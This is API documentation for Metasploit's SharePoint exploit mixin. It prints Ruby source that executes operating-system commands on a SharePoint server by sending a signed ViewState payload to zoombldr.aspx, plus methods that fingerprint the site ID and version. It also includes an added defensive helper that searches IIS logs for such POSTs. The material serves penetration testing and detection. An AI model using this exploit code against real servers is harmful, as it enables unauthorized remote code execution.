Module: Msf::Exploit::Remote::HTTP::Sharepoint
- Includes: Msf::Exploit::Remote::HttpClient, ViewState
- Defined in: lib/msf/core/exploit/remote/http/sharepoint.rb
Overview
This module provides a way of interacting with SharePoint installations.
Instance Attribute Summary
Attributes included from Msf::Exploit::Remote::HttpClient
Instance Method Summary
- #sharepoint_execute_command_via_viewstate(cmd, validation_key, http_request_opts = {}) ⇒ nil
  Execute an operating system command by crafting and sending a viewstate to the remote server.
- #sharepoint_get_site_web_id(http_request_opts = {}) ⇒ String?
  Get the site’s webID.
- #sharepoint_get_version(http_request_opts = {}) ⇒ Rex::Version?
  Get the SharePoint version number.
Methods included from ViewState
#can_sign_viewstate?, #decode_viewstate, #extract_viewstate, #extract_viewstate_generator, #extract_viewstate_validation_key, #generate_viewstate, #generate_viewstate_hmac, #generate_viewstate_payload, #initialize, #pack_viewstate_generator, #pack_viewstate_validation_key
Methods included from Msf::Exploit::Remote::HttpClient
#basic_auth, #cleanup, #configure_http_login_scanner, #connect, #connect_ws, #deregister_http_client_options, #disconnect, #download, #full_uri, #handler, #http_fingerprint, #initialize, #lookup_http_fingerprints, #normalize_uri, #path_from_uri, #peer, #proxies, #reconfig_redirect_opts!, #request_opts_from_url, #request_url, #rhost, #rport, #send_request_cgi, #send_request_cgi!, #send_request_raw, #service_details, #setup, #ssl, #ssl_version, #strip_tags, #target_uri, #validate_fingerprint, #vhost
Methods included from Auxiliary::Report
#active_db?, #create_cracked_credential, #create_credential, #create_credential_and_login, #create_credential_login, #db, #db_warning_given?, #get_client, #get_host, #inside_workspace_boundary?, #invalidate_login, #mytask, #myworkspace, #myworkspace_id, #report_auth_info, #report_client, #report_exploit, #report_host, #report_loot, #report_note, #report_service, #report_vuln, #report_web_form, #report_web_page, #report_web_site, #report_web_vuln, #store_cred, #store_local, #store_loot
Methods included from Metasploit::Framework::Require
optionally, optionally_active_record_railtie, optionally_include_metasploit_credential_creation, #optionally_include_metasploit_credential_creation, optionally_require_metasploit_db_gem_engines
Instance Method Details
#sharepoint_execute_command_via_viewstate(cmd, validation_key, http_request_opts = {}) ⇒ nil
Execute an operating system command by crafting and sending a viewstate to the remote server. In order for this to work, the validation_key must be known.
# File 'lib/msf/core/exploit/remote/http/sharepoint.rb', line 24
def sharepoint_execute_command_via_viewstate(cmd, validation_key, http_request_opts = {})
  vprint_status("Executing command: #{cmd}")

  res = send_request_cgi(http_request_opts.merge({
    'method' => 'POST',
    'uri' => normalize_uri(target_uri.path, '/_layouts/15/zoombldr.aspx'),
    'vars_post' => {
      '__VIEWSTATE' => generate_viewstate_payload(
        cmd,
        extra: pack_viewstate_generator('63E6434F'), # /_layouts/15/zoombldr.aspx
        algo: 'sha256',
        key: pack_viewstate_validation_key(validation_key)
      )
    }
  }))

  unless res
    fail_with(Failure::Unreachable, "Target did not respond to #{__method__}")
  end

  unless res.code == 200
    fail_with(Failure::PayloadFailed, "Failed to execute command: #{cmd}")
  end

  vprint_good('Successfully executed command')
end
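For defenders, the request this method sends shows up as a POST to /_layouts/15/zoombldr.aspx wherever IIS W3C logging records cs-method and cs-uri-stem. The following is an added example, not part of the Metasploit source: a Ruby helper that reads the column layout from the log's #Fields directive and returns those POSTs for review. The name find_zoombldr_posts and the sample log lines are constructed for illustration.

```ruby
# Added example (not Metasploit code): hunt IIS W3C logs for POSTs to the
# endpoint targeted by sharepoint_execute_command_via_viewstate.
TARGET_SUFFIX = '/_layouts/15/zoombldr.aspx'.freeze

# Constructed sample log; all addresses come from documentation ranges.
SAMPLE_LOG = <<~LOG.freeze
  #Software: Microsoft Internet Information Services 10.0
  #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
  2024-01-10 09:14:02 192.0.2.10 GET /_layouts/15/start.aspx - 443 - 198.51.100.7 Mozilla/5.0 200
  2024-01-10 09:15:40 192.0.2.10 POST /_layouts/15/zoombldr.aspx - 443 - 203.0.113.45 - 200
  2024-01-10 09:15:58 192.0.2.10 POST /sites/hr/_layouts/15/ZoomBldr.aspx - 443 - 203.0.113.45 - 500
  2024-01-10 09:16:30 192.0.2.10 GET /_layouts/15/zoombldr.aspx - 443 - 198.51.100.7 Mozilla/5.0 200
LOG

# Returns one hash per POST whose URI stem ends with TARGET_SUFFIX.
def find_zoombldr_posts(log_text)
  fields = nil
  hits = []
  log_text.each_line do |line|
    line = line.strip
    next if line.empty?

    if line.start_with?('#Fields:')
      # Column order is configurable in IIS, so read it from the directive.
      fields = line.sub('#Fields:', '').split
      next
    end
    next if line.start_with?('#') || fields.nil?

    values = line.split(' ')
    next unless values.length == fields.length # skip truncated or corrupt rows

    row = fields.zip(values).to_h
    next unless row['cs-method'].to_s.casecmp?('POST')
    # IIS paths are case-insensitive and a site prefix may precede the path.
    next unless row['cs-uri-stem'].to_s.downcase.end_with?(TARGET_SUFFIX)

    hits << {
      time: "#{row['date']} #{row['time']}",
      client: row['c-ip'],
      uri: row['cs-uri-stem'],
      status: row['sc-status'].to_i
    }
  end
  hits
end

find_zoombldr_posts(SAMPLE_LOG).each { |hit| puts hit }
```

The method above treats a 200 response as success, so the recorded status of each hit is worth keeping alongside the client address.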
#sharepoint_get_site_web_id(http_request_opts = {}) ⇒ String?
Get the site’s webID.
# File 'lib/msf/core/exploit/remote/http/sharepoint.rb', line 55
def sharepoint_get_site_web_id(http_request_opts = {})
  res = send_request_cgi(http_request_opts.merge({
    'method' => 'GET',
    'uri' => normalize_uri(target_uri.path, '_api', 'web', 'id')
  }))

  return nil unless res&.code == 200

  res.get_xml_document.at('//d:Id')&.text
end
#sharepoint_get_version(http_request_opts = {}) ⇒ Rex::Version?
Get the SharePoint version number.
# File 'lib/msf/core/exploit/remote/http/sharepoint.rb', line 72
def sharepoint_get_version(http_request_opts = {})
  res = send_request_cgi(http_request_opts.merge({
    'method' => 'GET',
    'uri' => normalize_uri(target_uri.path)
  }))

  # `&.` only guards the next call, so check for a missing response
  # before indexing into the headers.
  return nil unless res
  return nil unless /^(?<build>[\d.]+)/ =~ res.headers['MicrosoftSharePointTeamServices']

  Rex::Version.new(build)
end